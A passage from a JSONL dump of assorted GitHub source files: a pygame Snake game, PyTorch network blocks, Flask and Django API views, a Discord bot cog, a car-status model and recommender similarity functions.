score, snake_pos, direction):\n\tpygame.display.set_caption(\"SnakeGame\")\n\t# now, with currect state, we will state our game\n\t# 0 - left, 1 - right, 2 - up, 3 - down\n\t# created borders\n\tdx, dy = 0, 0\n\tif direction == 0:\n\t\tdx, dy = -1, 0\n\tif direction == 1:\n\t\tdx, dy = 1, 0\n\tif direction == 2:\n\t\tdx, dy = 0, -1\n\tif direction == 3:\n\t\tdx, dy = 0, 1\n\t# 0 - left, 1 - right, 2 - up, 3 - down\n\t# created dx, dy\n\tsnake = Snake(snake_pos)\n\tborder = Border(lvl)\n\tborder.load_border()\n\tfood = Food()\n\tfood.create_new(snake.body, border.border_list, time.time())\n\tis_started = False\n\tpause = False\n\twhile True:\n\t\tfor event in pygame.event.get():\n\t\t\tif event.type == QUIT:\n\t\t\t\t# closing the window, so we should insert into table current state\n\t\t\t\tcur_dir = None\n\t\t\t\tif dx == -1:\n\t\t\t\t\tcur_dir = 0\n\t\t\t\tif dx == 1:\n\t\t\t\t\tcur_dir = 1\n\t\t\t\tif dy == -1:\n\t\t\t\t\tcur_dir = 2\n\t\t\t\tif dy == 1:\n\t\t\t\t\tcur_dir = 3\n\t\t\t\tupdate_user(username, lvl, score, get_string_body(snake.body), cur_dir)\n\t\t\t\tpygame.quit()\n\t\t\t\tsys.exit()\n\t\t\tif event.type == KEYDOWN:\n\t\t\t\tif event.key == K_SPACE:\n\t\t\t\t\tpause = not pause\n\t\t\t\tif event.key == K_UP and dy != 1:\n\t\t\t\t\tdx, dy = 0, -1\n\t\t\t\t\tis_started = True\n\t\t\t\telif event.key == K_DOWN and dy != -1:\n\t\t\t\t\tdx, dy = 0, 1\n\t\t\t\t\tis_started = True\n\t\t\t\telif event.key == K_LEFT and dx != 1:\n\t\t\t\t\tdx, dy = -1, 0\n\t\t\t\t\tis_started = True\n\t\t\t\telif event.key == K_RIGHT and dx != -1:\n\t\t\t\t\tdx, dy = 1, 0\n\t\t\t\t\tis_started = True\n\n\t\tif pause == True:\n\t\t\tcontinue\n\t\tSPEED = min(9 * pow(1.30, score/4), 25)\n\t\ttail_pos = None\n\t\tif is_started:\n\t\t\ttail_pos = Point(snake.body[-1].x, snake.body[-1].y)\n\t\t\tsnake.move(dx, dy)\n\n\t\tif is_started and (snake.check_collision_snake() or snake.check_collision_border(border.border_list)):\n\t\t\t# Lost the game should insert into database (0, 0, )\n\t\t\tcur_dir = None\n\t\t\tif dx == -1:\n\t\t\t\tcur_dir = 0\n\t\t\tif dx == 1:\n\t\t\t\tcur_dir = 1\n\t\t\tif dy == -1:\n\t\t\t\tcur_dir = 2\n\t\t\tif dy == 1:\n\t\t\t\tcur_dir = 3\n\t\t\tbody_pos = f\"{WIDTH // 30 // 2}, {HEIGHT // 30 // 2}; {WIDTH // 30 // 2 + 1}, {HEIGHT // 30 // 2}\"\n\t\t\tupdate_user(username, 0, 0, body_pos, 0)\n\t\t\tpygame.quit()\n\t\t\tsys.exit()\n\n\n\t\tif is_started and snake.check_collision_food(food):\n\t\t\tscore += food.weight\n\t\t\tsnake.body.append(tail_pos)\n\t\t\tfood.create_new(snake.body, border.border_list, time.time())\n\n\t\tif time.time() - food.spawn_time >= 4:\n\t\t\tfood.create_new(snake.body, border.border_list, time.time())\n\n\n\t\tSCREEN.fill(background_color)\n\t\tpygame.draw.rect(SCREEN, (250, 250, 250), pygame.Rect(0, (HEIGHT // BLOCK + 1) * BLOCK, WIDTH, BLOCK))\n\t\tdraw_text(score, lvl)\n\t\tfood.draw()\n\t\tborder.draw()\n\t\tsnake.draw()\n\t\tpygame.display.update()\n\n\t\tif score >= 9 and lvl < 2: # next level\n\t\t\tlvl += 1\n\t\t\tscore = 0\n\t\t\tborder = Border(lvl)\n\t\t\tborder.load_border()\n\t\t\tpause = False\n\t\t\tis_started = False\n\t\t\tdx, dy = -1, 0\n\t\t\t# username, lvl, score, snake_pos, direction\n\t\t\tbody_pos = get_snake_pos(f\"{WIDTH // 30 // 2}, {HEIGHT // 30 // 2}; {WIDTH // 30 // 2 + 1}, {HEIGHT // 30 // 2}\")\n\t\t\tsnake = Snake(body_pos)\n\t\t\tfood.create_new(snake.body, border.border_list, time.time())\n\t\t\tcur_dir = None\n\t\t\tif dx == -1:\n\t\t\t\tcur_dir = 0\n\t\t\tif dx == 1:\n\t\t\t\tcur_dir = 1\n\t\t\tif dy == -1:\n\t\t\t\tcur_dir = 2\n\t\t\tif dy == 1:\n\t\t\t\tcur_dir = 3\n\t\t\tupdate_user(username, lvl, score, get_string_body(snake.body), cur_dir)\n\n\n\t\tclock.tick(SPEED)\n\n\n# lvl, score, body_pos, direction\n\ndef get_snake_pos(a):\n\tl1 = a.split(';')\n\tpositions = []\n\tfor pos in l1:\n\t\tx, y = pos.split(',')\n\t\tpositions.append(Point(int(x), int(y)))\n\n\treturn positions\n\ndef main():\n\tmainMenu = Main_menu(WIDTH, RHEIGHT)\n\tcur_state = mainMenu.runGame(SCREEN)\n\tsnake_pos = get_snake_pos(cur_state[3])\n\tusername = cur_state[0]\n\tlvl = cur_state[1]\n\tscore = cur_state[2]\n\tdirection = cur_state[4]\n\trunGame(username, lvl, score, snake_pos, direction)\n\nif __name__ == \"__main__\":\n\tmain()\n","repo_name":"NurstanDuisengaliyev/pp2-22B031491","sub_path":"tsis10/SnakeGame/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":7865,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"3859008647","text":"T = int(input())\n\nfor _ in range(T):\n N = bin(int(input()))\n N = N[2:]\n\n answer = []\n\n for idx in range(len(N)):\n letter = int(N[len(N)-1-idx])\n\n if letter != 0:\n answer.append(str(idx))\n\n print(\" \".join(answer))\n","repo_name":"yeong-hwan/algorithm-study","sub_path":"yeonghwan/algorithm-boj/sep/3460.py","file_name":"3460.py","file_ext":"py","file_size_in_byte":253,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"71"}
+{"seq_id":"30703677946","text":"import torch\nimport numpy as np\n\nfrom torchvision import datasets\nimport torchvision.transforms as transforms\nfrom torch.utils.data.sampler import SubsetRandomSampler\nimport matplotlib.pyplot as plt\n\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\n#%matplotlib inline\n\nimport cv2\nfrom timeit import default_timer as timer\n\n\n\n# Residual block in bottleneck style\n# input: input depth\n# output with same shape as input\nclass ResidualBottleNeckBlock(nn.Module):\n def __init__(self, input_channels, bottleneck_ratio):\n super(ResidualBottleNeckBlock, self).__init__()\n self.reduction = nn.Conv2d(input_channels,input_channels//bottleneck_ratio,1)\n self.batch_red = nn.BatchNorm2d(input_channels//bottleneck_ratio)\n self.conv = nn.Conv2d(input_channels//bottleneck_ratio,input_channels//bottleneck_ratio,3,padding=1)\n self.batch_conv = nn.BatchNorm2d(input_channels//bottleneck_ratio)\n self.expansion = nn.Conv2d(input_channels//bottleneck_ratio,input_channels,1)\n self.batch_exp = nn.BatchNorm2d(input_channels)\n\n\n def forward(self, x):\n\n out = F.relu(self.batch_red(self.reduction(x)))\n out = F.relu(self.batch_conv(self.conv(out)))\n out = self.batch_exp(self.expansion(out))\n\n return F.relu(out+x)\n\n\n# Residual block in bottleneck style\n# input: input depth\n# output with same shape as input\nclass PreActivationResidualBlock(nn.Module):\n def __init__(self, input_channels):\n super(PreActivationResidualBlock, self).__init__()\n self.bn_1 = nn.BatchNorm2d(input_channels)\n self.conv_1 = nn.Conv2d(input_channels,input_channels,3,padding=1)\n self.bn_2 = nn.BatchNorm2d(input_channels)\n self.conv_2 = nn.Conv2d(input_channels,input_channels,3,padding=1)\n\n\n def forward(self, x):\n\n out = self.conv_1(F.relu(self.bn_1(x)))\n out = self.conv_2(F.relu(self.bn_2(out)))\n\n return out+x\n\n# Residual block in bottleneck style\n# input: input depth\n# output with double depth and half scale\nclass PreActivationReductionBlock(nn.Module):\n def __init__(self, input_channels):\n super(PreActivationReductionBlock, self).__init__()\n self.bn_1 = nn.BatchNorm2d(input_channels)\n self.conv_1 = nn.Conv2d(input_channels,2*input_channels,3,padding=1,stride=2)\n self.bn_2 = nn.BatchNorm2d(input_channels*2)\n self.conv_2 = nn.Conv2d(input_channels*2,input_channels*2,3,padding=1)\n\n\n def forward(self, x):\n\n out = self.conv_1(F.relu(self.bn_1(x)))\n out = self.conv_2(F.relu(self.bn_2(out)))\n\n return out\n\n\n# Squeeze and Excitation block\nclass SEblock(nn.Module):\n def __init__(self, input_channels, height, width, ratio):\n super(SEblock, self).__init__()\n self.input_channels = input_channels\n\n self.squeeze = nn.AvgPool2d((height,width),(height,width))\n self.fc = nn.Linear(input_channels,input_channels//ratio)\n self.excite = nn.Linear(input_channels//ratio,input_channels)\n\n def forward(self, x):\n\n se = self.squeeze(x)\n se = se.view(-1,self.input_channels)\n se = F.relu(self.fc(se))\n se = torch.sigmoid(self.excite(se))\n se = se.view(-1,self.input_channels,1,1)\n\n x = x * se.expand_as(x)\n\n return x\n\n\n#Squeee and Excitation Residual block with bottleneck style\nclass SE_ResidualBottleNeckBlock(nn.Module):\n def __init__(self, input_channels, height, width, bottleneck_ratio, se_ratio):\n super(SE_ResidualBottleNeckBlock, self).__init__()\n self.reduction = nn.Conv2d(input_channels,input_channels//bottleneck_ratio,1)\n self.batch_red = nn.BatchNorm2d(input_channels//bottleneck_ratio)\n self.conv = nn.Conv2d(input_channels//bottleneck_ratio,input_channels//bottleneck_ratio,3,padding=1)\n self.batch_conv = nn.BatchNorm2d(input_channels//bottleneck_ratio)\n self.expansion = nn.Conv2d(input_channels//bottleneck_ratio,input_channels,1)\n self.batch_exp = nn.BatchNorm2d(input_channels)\n\n self.se = SEblock(input_channels, height, width, se_ratio)\n\n\n def forward(self, x):\n\n out = F.relu(self.batch_red(self.reduction(x)))\n out = F.relu(self.batch_conv(self.conv(out)))\n out = self.batch_exp(self.expansion(out))\n\n # SE must be applied prior to the identity addition\n out = self.se(out)\n\n return F.relu(out+x)\n\nclass DenseBlock(nn.Module):\n def __init__(self, input_channels, inner_output, layers):\n super(DenseBlock, self).__init__()\n\n self.layers = layers\n self.reduction = nn.ModuleList([nn.Conv2d(input_channels+i*inner_output, inner_output,1) for i in range(layers)])\n self.conv = nn.ModuleList([nn.Conv2d(inner_output, inner_output,3,padding=1) for i in range(layers)])\n self.norm1 = nn.ModuleList([nn.BatchNorm2d(input_channels+i*inner_output) for i in range(layers)])\n self.norm2 = nn.ModuleList([nn.BatchNorm2d(inner_output) for i in range(layers)])\n\n\n def forward(self, x):\n\n for i in range(self.layers):\n out = self.norm1[i](x)\n out = F.relu(out)\n out = self.reduction[i](out)\n out = self.norm2[i](out)\n out = F.relu(out)\n out = self.conv[i](out)\n x = torch.cat((x,out),1)\n\n return x","repo_name":"RicardoBauchspiess/ComputerVision","sub_path":"Classification/CustomArchitecture/blocks.py","file_name":"blocks.py","file_ext":"py","file_size_in_byte":5336,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"34730847450","text":"from telebot import types\nfrom bot.bot_connection import bot\nfrom database.database_commands import search\n\n\ndef query_text(inline_query):\n try:\n result = list(\n map(lambda recipe: types.InlineQueryResultArticle(id=recipe[0],\n title=recipe[2], input_message_content=types.InputTextMessageContent(recipe[2])\n ),\n search('recipe', inline_query.query)\n ))\n\n bot.answer_inline_query(inline_query.id, result)\n except Exception as e:\n print(e)\n","repo_name":"leevayy/edabudet","sub_path":"inline.py","file_name":"inline.py","file_ext":"py","file_size_in_byte":536,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"5369497356","text":"from .serializers import UserProfileSerializer\nfrom rest_framework.views import APIView\nfrom rest_framework.response import Response\nfrom rest_framework import status\nfrom rest_framework.parsers import MultiPartParser,FormParser\nfrom django.contrib.auth import get_user_model\nfrom .models import UserProfile\nUser = get_user_model()\n\nclass UserProfileView(APIView):\n\n # parser_classes = MultiPartParser, FormParser\n\n def get(self,request,*args,**kwargs):\n try:\n userprofile = UserProfile.objects.get(user=request.user)\n serializer = UserProfileSerializer(instance=userprofile)\n return Response(serializer.data,status=status.HTTP_200_OK)\n except UserProfile.DoesNotExist:\n return Response({'msg':'ok'},status=status.HTTP_304_NOT_MODIFIED)\n\n def post(self,request,format=None):\n data = request.data\n data['user'] = request.user\n try:\n UserProfile.objects.get(user=request.user)\n except Exception:\n UserProfile.objects.create(**data)\n return Response({'msg':'ok'})\n\n def put(self,request):\n user_profile = request.user.userprofile\n user_profile.country = request.data['country']\n user_profile.address = request.data['address']\n user_profile.save()\n return Response({'msg':\"updated\"})\n\n\n\n\n \n\n\n \n\n \n\n\n","repo_name":"rojit1/sg_app","sub_path":"userprofile/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1278,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"33388618151","text":"from flask import request\nfrom flask_restful import Resource\nfrom ..schema import *\nfrom ..business import MagnitudeBusiness\nfrom .query_params_helper import QueryParamsHelper\nimport json\n\nmagnitude_business = MagnitudeBusiness()\n\nclass MagnitudeListEndpoint(Resource):\n @staticmethod\n def get():\n #Get params from url\n page, per_page, order_by, order_by_descending = QueryParamsHelper.get_paged_params(request)\n #Get stations from business\n magnitudes = magnitude_business.get_magnitudes(page, per_page, order_by, order_by_descending)\n #Instance schema\n pfocollection_schema = get_pfo(MagnitudeDtoSchema)\n #Return json data\n return pfocollection_schema.dump(magnitudes, many=False)\n\nclass MagnitudeCreationEndpoint(Resource):\n @staticmethod\n def post():\n #Instance schema\n magnitude_creation_dto_schema = MagnitudeCreationDtoSchema()\n #Parse json to dto\n magnitude_creation_dto = magnitude_creation_dto_schema.loads(request.data)\n #Create magnitude\n return magnitude_business.create_magnitude(magnitude_creation_dto)\n\nclass MagnitudeUpdateEndpoint(Resource):\n @staticmethod\n def put():\n #Get params from url\n magnitude_id = request.args.get('id')\n #Instance schema\n magnitude_update_dto_schema = MagnitudeUpdateDtoSchema()\n #Parse json to dto\n magnitude_update_dto = magnitude_update_dto_schema.loads(request.data)\n #Create station\n return magnitude_business.update_magnitude(magnitude_id, magnitude_update_dto)\n\nclass MagnitudeBatchCreationEndpoint(Resource):\n @staticmethod\n def post():\n #Instance schema\n magnitude_creation_dto_schema = MagnitudeCreationDtoSchema()\n #Parse json to dto\n magnitude_creation_dto_list = magnitude_creation_dto_schema.loads(request.data, many=True)\n #Create measurement\n items_not_created = magnitude_business.create_magnitudes_in_batch(magnitude_creation_dto_list)\n #Instance result schema\n magnitude_batch_creation_result_dto_schema = BatchCreationResultDtoSchema()\n #Return json data\n return magnitude_batch_creation_result_dto_schema.dump(items_not_created, many=False)\n\nclass MagnitudeExistenceEndpoint(Resource):\n @staticmethod\n def get():\n #Get params from url\n magnitude_ids = request.args.getlist('ids')\n #Get not found magnitude ids\n magnitude_existence_dto = magnitude_business.magnitude_existence(magnitude_ids)\n #Instance schema\n magnitude_existence_dto_schema = ExistenceDtoSchema()\n #Return json data\n return magnitude_existence_dto_schema.dump(magnitude_existence_dto, many=False)\n\n","repo_name":"daviferna/borealis","sub_path":"Borealis.Api/app/api/magnitude_endpoint.py","file_name":"magnitude_endpoint.py","file_ext":"py","file_size_in_byte":2742,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"9342546652","text":"# 721. Accounts Merge\n# DescriptionHintsSubmissionsDiscussSolution\n# Given a list accounts, each element accounts[i] is a list of strings, where the first element accounts[i][0] is a name, and the rest of the elements are emails representing emails of the account.\n\n# Now, we would like to merge these accounts. Two accounts definitely belong to the same person if there is some email that is common to both accounts. Note that even if two accounts have the same name, they may belong to different people as people could have the same name. A person can have any number of accounts initially, but all of their accounts definitely have the same name.\n\n# After merging the accounts, return the accounts in the following format: the first element of each account is the name, and the rest of the elements are emails in sorted order. The accounts themselves can be returned in any order.\n\n# Example 1:\n# Input: \n# accounts = [[\"John\", \"johnsmith@mail.com\", \"john00@mail.com\"], [\"John\", \"johnnybravo@mail.com\"], [\"John\", \"johnsmith@mail.com\", \"john_newyork@mail.com\"], [\"Mary\", \"mary@mail.com\"]]\n# Output: [[\"John\", 'john00@mail.com', 'john_newyork@mail.com', 'johnsmith@mail.com'], [\"John\", \"johnnybravo@mail.com\"], [\"Mary\", \"mary@mail.com\"]]\n# Explanation: \n# The first and third John's are the same person as they have the common email \"johnsmith@mail.com\".\n# The second John and Mary are different people as none of their email addresses are used by other accounts.\n# We could return these lists in any order, for example the answer [['Mary', 'mary@mail.com'], ['John', 'johnnybravo@mail.com'], \n# ['John', 'john00@mail.com', 'john_newyork@mail.com', 'johnsmith@mail.com']] would still be accepted.\n# Note:\n\n# The length of accounts will be in the range [1, 1000].\n# The length of accounts[i] will be in the range [1, 10].\n# The length of accounts[i][j] will be in the range [1, 30].\n\nclass Solution(object):\n def accountsMerge(self, accounts):\n \"\"\"\n :type accounts: List[List[str]]\n :rtype: List[List[str]]\n \"\"\"\n # build graph\n email2acc = dict()\n for i, acc in enumerate(accounts):\n for email in acc[1:]:\n if email in email2acc:\n email2acc[email].append(i)\n else:\n email2acc[email] = [i]\n graph = [[] for _ in accounts]\n for i, acc in enumerate(accounts):\n for email in acc[1:]:\n graph[i] += email2acc[email]\n # traverse graph\n visited = set()\n res = []\n for i in range(len(graph)):\n if i in visited:\n continue\n acc = [accounts[i][0], []]\n # breath first search\n level = [i]\n while level:\n node = level.pop(0)\n if node in visited:\n continue\n visited.add(node)\n acc[1] += accounts[node][1:]\n for child in graph[node]:\n level.append(child)\n acc[1] = sorted(list(set(acc[1])))\n res.append([acc[0]] + acc[1])\n return res\n\n\n","repo_name":"chunjiw/leetcode","sub_path":"L721_accountsMerge.py","file_name":"L721_accountsMerge.py","file_ext":"py","file_size_in_byte":3132,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"2783218450","text":"# -*- coding: utf-8 -*-\nfrom flask import Blueprint, jsonify, request\nfrom werkzeug.utils import secure_filename\n\nimport json\nimport os\nimport config\nfrom mongo_data import commodity\nfrom mongoengine import *\n\n\nupload = Blueprint('upload', __name__)\n\n\n@upload.route(\"/upload/single\", methods=[\"POST\"])\ndef upload_single():\n data = request.data.decode(\"UTF-8\")\n ret = dict()\n ret[\"err_no\"] = 0\n ret[\"err_msg\"] = \"success\"\n try:\n data = json.loads(data)\n index = data[\"commodity_source\"] + data[\"source_id\"]\n comm = commodity.Commodity()\n comm.name = data[\"name\"]\n comm.description = data[\"description\"]\n comm.index = index\n comm.price_list = data[\"price_list\"]\n comm.expect_price = data[\"expect_price\"]\n comm.source_id = data[\"source_id\"]\n comm.commodity_source = data[\"commodity_source\"]\n comm.commodity_url = data[\"commodity_url\"]\n comm.save()\n except KeyError as e:\n ret[\"err_no\"] = 1\n ret[\"err_msg\"] = \"not have key\" + str(e)\n except ValueError:\n ret[\"err_no\"] = 1\n ret[\"err_msg\"] = \"json data resolve failed\"\n except NotUniqueError:\n ret[\"err_no\"] = 2\n ret[\"err_msg\"] = \"you must not upload the same information twice\"\n return jsonify(ret)\n\n\n@upload.route(\"/upload/multi\", methods=[\"POST\"])\ndef upload_multi():\n count = 0\n datas = request.data.decode(\"utf-8\")\n ret = dict()\n ret[\"err_no\"] = 0\n ret[\"err_msg\"] = \"0\"\n comms = []\n try:\n datas = json.loads(datas)\n for data in datas:\n index = data[\"commodity_source\"] + data[\"source_id\"]\n comm = commodity.Commodity()\n comm.name = data[\"name\"]\n comm.description = data[\"description\"]\n comm.price_list = data[\"price_list\"]\n comm.index = index\n comm.expect_price = data[\"expect_price\"]\n comm.source_id = data[\"source_id\"]\n comm.commodity_source = data[\"commodity_source\"]\n comm.commodity_url = data[\"commodity_url\"]\n count += 1\n comms.append(comm)\n commodity.Commodity.objects.insert(doc_or_docs=comms)\n except KeyError as e:\n ret[\"err_no\"] = 1\n ret[\"err_msg\"] = \"not have key\" + str(e)\n return jsonify(ret)\n except ValueError:\n ret[\"err_no\"] = 1\n ret[\"err_msg\"] = \"json data resolve failed\"\n return jsonify(ret)\n except NotUniqueError as e:\n ret[\"err_no\"] = 1\n ret[\"err_msg\"] = \"you must not upload the same information twice, \" + str(e)\n return jsonify(ret)\n ret[\"err_msg\"] = str(count)\n return jsonify(ret)\n\n\n@upload.route(\"/upload/imgupload//\", methods=[\"POST\"])\ndef imgupload(source_id, commodity_source):\n ret = dict()\n ret[\"err_no\"] = 0\n ret[\"err_msg\"] = \"success\"\n try:\n f = request.files['img_file']\n tmp = f.filename.split(\".\")\n tmp[0] = source_id\n f.filename = \".\".join(tmp)\n print(f.filename)\n if not f:\n raise FileNotFoundError\n try:\n fname = secure_filename(f.filename)\n f.save(os.path.join(config.IMAGE_FOLDER, commodity_source, fname))\n except FileExistsError:\n ret[\"err_no\"] = 1\n ret[\"err_msg\"] = \"save this image error\"\n return jsonify(ret)\n except FileNotFoundError:\n ret[\"err_no\"] = 1\n ret[\"err_msg\"] = \"not have this file or open file error\"\n return jsonify(ret)\n\n return jsonify(ret)\n\n\n","repo_name":"interfaceFeng/price_forecast","sub_path":"price_interface/uploads.py","file_name":"uploads.py","file_ext":"py","file_size_in_byte":3551,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"70"}
+{"seq_id":"36601831270","text":"import logging\n\nfrom psa_car_controller.psa.connected_car_api import Battery\nfrom psa_car_controller.psa.connected_car_api.models.energy import Energy\nfrom psa_car_controller.psa.connected_car_api.models.energy_charging import EnergyCharging\nfrom psa_car_controller.psa.connected_car_api.models.geometry import Geometry\nfrom psa_car_controller.psa.connected_car_api.models.kinetic import Kinetic\nfrom psa_car_controller.psa.connected_car_api.models.position import Position\nfrom psa_car_controller.psa.connected_car_api.models.position_properties import PositionProperties\nfrom psa_car_controller.psa.connected_car_api.models.status import Status\nfrom psa_car_controller.psa.connected_car_api.models.vehicle_odometer import VehicleOdometer\n\nlogger = logging.getLogger(__name__)\n\n\n# pylint: disable=too-many-arguments\nclass CarStatus(Status):\n def __init__(self, embedded=None, links=None, battery=None, doors_state=None, energy=None, environment=None,\n ignition=None, kinetic=None, last_position=None, preconditionning=None, privacy=None, safety=None,\n service=None, timed_odometer=None): # noqa: E501\n super().__init__(embedded, links, battery, doors_state, energy, environment, ignition, kinetic, last_position,\n preconditionning, privacy, safety, service, timed_odometer)\n self.correct(False)\n\n def correct(self, electric_car):\n try:\n if len(self.last_position.geometry.coordinates) < 2:\n raise AttributeError()\n if len(self.last_position.geometry.coordinates) < 3:\n # set altitude none\n self.last_position.geometry.coordinates.append(None)\n except (AttributeError, TypeError):\n self.last_position = Position(geometry=Geometry(coordinates=[None, None, None], type=\"Point\"),\n properties=PositionProperties(updated_at=None))\n if self.kinetic is None:\n self.kinetic = Kinetic()\n # always put electric energy first\n if len(self._energy) == 2 and self._energy[0].type != 'Electric':\n self._energy = self._energy[::-1]\n\n if self.timed_odometer is None:\n self.timed_odometer = VehicleOdometer()\n if electric_car:\n self.get_energy(\"Fuel\").level = None\n if self.battery is None:\n self.battery = Battery()\n\n def is_moving(self):\n try:\n return self.kinetic.moving\n except AttributeError:\n logger.error(\"kinetic not available from api\")\n return None\n\n def get_energy(self, energy_type) -> Energy:\n for energy in self._energy:\n if energy.type == energy_type:\n return energy\n return Energy(charging=EnergyCharging())\n","repo_name":"flobz/psa_car_controller","sub_path":"psa_car_controller/psacc/model/car_status.py","file_name":"car_status.py","file_ext":"py","file_size_in_byte":2806,"program_lang":"python","lang":"en","doc_type":"code","stars":306,"dataset":"github-code","pt":"70"}
+{"seq_id":"35159488173","text":"import logging\n\nimport disnake\nfrom disnake.ext import commands\n\nfrom cogs.utils import database as db\nORM = db.ORM()\n\nlogger = logging.getLogger('bot.Guilds')\n\n\nclass Guilds(commands.Cog):\n \"\"\" Manage when the bot is added/removed from a guild.\n \"\"\"\n\n def __init__(self, bot: commands.Bot):\n self.bot = bot\n logger.info('Loaded.')\n\n msg = \"Use the command below **in your Server** to follow your first game 🎮\\n\"\n msg += \"```\\n\"\n msg += \"/dt-set-channel game\\n\"\n msg += \"```\\n\"\n msg += \"You can find some explanations for all available commands on .\"\n\n self.server_btn = disnake.ui.Button(\n label=\"Official Discord Server\",\n url=\"https://discord.gg/QN9uveFYXX\",\n style=disnake.ButtonStyle.link,\n ),\n\n self.help_message = msg\n\n # ---------------------------------------------------------------------------------\n # EVENT LISTENERS\n # ---------------------------------------------------------------------------------\n\n @commands.Cog.listener()\n async def on_message(self, message: disnake.Message):\n if isinstance(message.channel, disnake.DMChannel) and message.author != self.bot.user:\n\n await message.reply(self.help_message, components=[self.server_btn])\n\n\n @commands.Cog.listener()\n async def on_guild_join(self, guild : disnake.Guild):\n\n dt_channel = self.bot.get_channel(985250371981172757)\n if dt_channel:\n await dt_channel.send(f'`{guild.name} [{guild.id}]` joined. (Approx `{guild.member_count}` members)')\n\n await ORM.add_guild(guild.id)\n logger.info(f'{guild.name} [{guild.id}] added to DB.')\n\n\n # We can see the owner only if we have the Members privileged intent\n if not guild.owner_id:\n return\n\n msg = \"I'm now ready to track GameDevs for you !\\n\"\n msg += self.help_message\n\n try:\n owner = await self.bot.fetch_user(guild.owner_id)\n if not owner.dm_channel:\n await owner.create_dm()\n await owner.dm_channel.send(msg, components=[self.server_btn])\n except disnake.Forbidden:\n logger.warning(f'{guild.name}[{guild.id}] owner has blocked his DMs.')\n\n\n @commands.Cog.listener()\n async def on_guild_remove(self, guild : disnake.Guild):\n\n dt_channel = self.bot.get_channel(985250371981172757)\n if dt_channel:\n await dt_channel.send(f'`{guild.name} [{guild.id}]` removed. (Approx `{guild.member_count}` members)')\n\n await ORM.rm_guild(guild.id)\n logger.info(f'{guild.name} [{guild.id}] removed from DB.')\n\n # ---------------------------------------------------------------------------------\n # SLASH COMMANDS\n # ---------------------------------------------------------------------------------\n\n @commands.slash_command(name=\"dt-invite\", description=\"Invite DevTracker to your server.\")\n async def invite(self, inter : disnake.ApplicationCommandInteraction):\n logger.info(f'{inter.guild.name} [{inter.guild_id}] : Show invite link.')\n\n invite_btn = disnake.ui.Button(\n label=\"Invite Me !\",\n url=\"https://discord.com/api/oauth2/authorize?client_id=982257201211138050&permissions=274877958144&scope=applications.commands%20bot\",\n style=disnake.ButtonStyle.link,\n ),\n\n await inter.response.send_message(components=[invite_btn])\n\n @commands.slash_command(name=\"dt-help\", description=\"Struggling getting started?\")\n @commands.default_member_permissions(manage_guild=True)\n async def get_help_message(self, inter : disnake.ApplicationCommandInteraction):\n logger.info(f'{inter.guild.name} [{inter.guild_id}] : Show help.')\n\n await inter.response.send_message(self.help_message, components=[self.server_btn])\n\n @commands.slash_command(name=\"dt-discord-support\", description=\"Join the official DevTracker Discord Server.\")\n @commands.default_member_permissions(manage_guild=True)\n async def get_help_message(self, inter : disnake.ApplicationCommandInteraction):\n logger.info(f'{inter.guild.name} [{inter.guild_id}] : Show Server Invite.')\n\n await inter.response.send_message(components=[self.server_btn])\n\ndef setup(bot: commands.Bot):\n bot.add_cog(Guilds(bot))\n","repo_name":"s0me-1/devtracker-bot","sub_path":"cogs/guilds.py","file_name":"guilds.py","file_ext":"py","file_size_in_byte":4386,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"70"}
+{"seq_id":"12287340760","text":"# -*- coding: utf-8 -*-\nfrom numpy import *\nfrom numpy import linalg as la\n\n\ndef loadExData():\n return [[0, 0, 0, 2, 2],\n [0, 0, 0, 3, 3],\n [0, 0, 0, 1, 1],\n [1, 1, 1, 0, 0],\n [2, 2, 2, 0, 0],\n [5, 5, 5, 0, 0],\n [1, 1, 1, 0, 0]]\n\n\ndef loadExData2():\n return [[0, 0, 0, 0, 0, 4, 0, 0, 0, 0, 5],\n [0, 0, 0, 3, 0, 4, 0, 0, 0, 0, 3],\n [0, 0, 0, 0, 4, 0, 0, 1, 0, 4, 0],\n [3, 3, 4, 0, 0, 0, 0, 2, 2, 0, 0],\n [5, 4, 5, 0, 0, 0, 0, 5, 5, 0, 0],\n [0, 0, 0, 0, 5, 0, 1, 0, 0, 5, 0],\n [4, 3, 4, 0, 0, 0, 0, 5, 5, 0, 1],\n [0, 0, 0, 4, 0, 4, 0, 0, 0, 0, 4],\n [0, 0, 0, 2, 0, 2, 5, 0, 0, 1, 2],\n [0, 0, 0, 0, 5, 0, 0, 0, 0, 4, 0],\n [1, 0, 0, 0, 0, 0, 0, 1, 2, 0, 0]]\n#相似度1:欧式距离\ndef ecludSim(inA,inB):\n return 1.0/(1.0 + la.norm(inA - inB))\n#相似度2:威尔逊距离\ndef pearsSim(inA,inB):\n if len(inA) < 3 : return 1.0\n return 0.5+0.5*corrcoef(inA, inB, rowvar = 0)[0][1]\n#相似度3:余弦\ndef cosSim(inA,inB):\n num = float(inA.T*inB)\n denom = la.norm(inA)*la.norm(inB)\n return 0.5 + 0.5 * (num / denom)\n\n\n#遍历 计算相似度\ndef standEst(dataMat, user, simMeas, item):#数据矩阵、用户编号、相似度计算方法和物品编号\n n = shape(dataMat)[1]\n simTotal = 0.0;ratSimTotal = 0.0\n for j in range(n):\n userRating = dataMat[user, j]\n if userRating == 0: continue\n #寻找两个用户都做了评价的产品\n overLap = nonzero(logical_and(dataMat[:, item].A > 0, dataMat[:, j].A > 0))[0]\n if len(overLap) == 0:\n similarity = 0\n else:#存在两个用户都评价的产品 计算相似度\n similarity = simMeas(dataMat[overLap, item], dataMat[overLap, j])\n print ('the %d and %d similarity is: %f' % (item, j, similarity))\n simTotal += similarity #计算每个用户对所有评价产品累计相似度\n ratSimTotal += similarity * userRating 